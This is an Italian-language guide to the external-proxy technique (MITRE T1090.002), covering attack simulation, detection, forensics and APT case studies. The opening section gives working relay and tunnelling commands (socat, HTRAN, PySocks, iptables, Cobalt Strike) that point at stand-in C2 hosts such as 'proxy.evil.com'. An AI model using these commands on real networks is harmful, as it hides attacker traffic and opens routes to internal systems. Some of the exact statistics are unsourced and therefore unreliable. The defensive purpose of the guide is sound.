Proxy Esterni: External Proxy (T1090.002)

La simulazione di proxy esterni inizia con l'implementazione di un redirector semplice. Su Linux, socat permette di creare un relay TCP basilare:

socat TCP-LISTEN:8080,fork TCP:c2server.com:443

Per scenari più complessi, HTRAN offre funzionalità avanzate di tunneling. La sintassi base per Windows prevede:

htran.exe -tran 443 192.168.1.100 3389

Questo comando reindirizza il traffico dalla porta 443 locale verso RDP sul target interno. La bellezza sta nella possibilità di concatenare multiple istanze per creare percorsi tortuosi.

Gli attaccanti sofisticati implementano SOCKS5 per maggiore flessibilità. Python offre librerie come PySocks per creare proxy custom:

import socks
socks.set_default_proxy(socks.SOCKS5, "proxy.evil.com", 1080)
socket.socket = socks.socksocket

La configurazione di proxy multipli richiede rotazione dinamica. PowerShell permette di gestire proxy di sistema:

[System.Net.WebRequest]::DefaultWebProxy = New-Object System.Net.WebProxy("http://proxy1.com:8080")

Per testing avanzato, Cobalt Strike integra funzionalità di proxy chaining native. Il comando socks 1080 attiva un listener SOCKS che può essere concatenato attraverso beacon multipli.

La persistenza del proxy richiede configurazioni di rete stabili. Su Linux, iptables permette di creare regole permanenti:

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.5:8080

La detection di proxy esterni richiede correlazione tra eventi di rete e comportamenti anomali di processo. Windows Sysmon cattura connessioni sospette attraverso l'EventID 3, particolarmente quando processi come rundll32.exe o mshta.exe iniziano comunicazioni verso IP esterni non comuni.

L'analisi del traffico NSM rivela pattern distintivi: connessioni outbound persistenti verso VPS providers o CDN con pochi pacchetti di ritorno. La metrica chiave è il rapporto tra traffico in uscita e in entrata - i proxy C2 mostrano tipicamente asimmetria marcata superiore a 10:1.

I falsi positivi derivano principalmente da servizi cloud legittimi che utilizzano proxy per bilanciamento del carico. La tuning list deve includere ASN di provider affidabili come Cloudflare o Akamai, distinguendo però le sottoreti dedicate a hosting economico spesso abusate.

La detection comportamentale si concentra su sequenze di azioni: processo sospetto → connessione esterna → traffico cifrato persistente. Splunk permette di correlare questi eventi:

index=sysmon EventCode=3 | stats count by Image, DestinationIp | where count > 100

Gli indicatori veloci includono:

• Connessioni verso porte non standard (né 80 né 443)
• Certificati SSL self-signed su connessioni persistenti
• User-agent anomali o assenti nel traffico HTTP/S
• Spike di connessioni verso nuovi domini dopo orario lavorativo

L'integrazione con threat intelligence permette di identificare IP già associati a campagne note. La latenza di aggiornamento degli IOC è critica - indicatori vecchi di 48 ore perdono il 70% di efficacia.

L'analisi forense di proxy esterni inizia dall'identificazione delle connessioni anomale nel registro di Windows. La chiave HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings contiene configurazioni proxy che possono rivelare redirector impostati dall'attaccante.

I log di Windows Firewall (%SystemRoot%\System32\LogFiles\Firewall\pfirewall.log) documentano ogni connessione outbound, permettendo di ricostruire quando il proxy è stato attivato per la prima volta. La correlazione temporale con eventi di processo mostra la catena di esecuzione.

Su Linux, l'analisi di /var/log/auth.log combinata con netstat snapshots (se disponibili) rivela connessioni SSH anomale usate come tunnel SOCKS. Il comando last mostra login remoti che potrebbero corrispondere all'attivazione di proxy.

APT28 ha dimostrato l'uso di server militari georgiani compromessi come hop point verso vittime NATO. La timeline mostra:

1. Compromissione iniziale del server georgiano
2. Installazione di CHOPSTICK con funzionalità proxy
3. Connessioni dalle vittime NATO verso il server compromesso
4. Relay del traffico verso l'infrastruttura C2 reale

Gli artefatti di rete includono entries ARP anomale per IP esterni, modifiche alle tabelle di routing (route print su Windows), e configurazioni di proxy in browser artifacts. Firefox memorizza proxy settings in prefs.js, Chrome in Preferences JSON.

La persistenza del proxy si manifesta attraverso scheduled task (schtasks) o servizi Windows che rilanciano i redirector. L'analisi del Prefetch può mostrare esecuzioni ripetute di tool come htran.exe o 3proxy.exe.

APT29 (Cozy Bear) utilizza sistematicamente endpoint residenziali compromessi come proxy, rendendo l'attribuzione complessa. Il gruppo preferisce ISP consumer in paesi NATO per mimetizzarsi nel traffico legittimo. Pattern geografico: 75% dei proxy in US/UK/Germania.

Lazarus Group implementa catene di proxy multiple, tipicamente 3-5 hop attraverso server compromessi in Asia. La loro infrastruttura mostra preferenza per hosting provider in Malesia, Hong Kong e Singapore. Caratteristica distintiva: rotazione dei proxy ogni 48-72 ore.

MuddyWater adotta un approccio unico utilizzando siti web compromessi come proxy randomizzati. Le vittime si connettono a un pool di 20-50 siti, rendendo il blocco difficile. Il gruppo favorisce CMS vulnerabili (WordPress, Joomla) in Medio Oriente.

APT39 (Chafer) dimostra sofisticazione nell'uso di tool proxy custom. Il gruppo sviluppa varianti proprietarie di SOCKS5 con funzionalità di evasione integrate. Overlap significativo con APT28 nell'uso di VPS provider specifici in Europa dell'Est.

La campagna Quad7 Activity rappresenta un'evoluzione: compromissione massiva di router SOHO (TP-Link, Asus) per creare una botnet di proxy. Indicatori: porte 7777 e 63256 con banner xlogin/alogin. Storm-0940 ha sfruttato questa infrastruttura per colpire agenzie governative e aziende del settore difesa.

Trend emergente: proxy-as-a-service su dark web, con APT che noleggiano infrastrutture invece di gestirle. Prezzi: $50-200/mese per proxy dedicato con uptime garantito. Previsione: aumento del 40% nell'uso di servizi commerciali entro 12 mesi.

Framework MITRE ATT&CK T1090.002. Campagna Quad7 Activity documentata da Microsoft Threat Intelligence. Detection signatures basate su analisi comportamentale multi-piattaforma per identificazione proxy esterni in ambienti enterprise.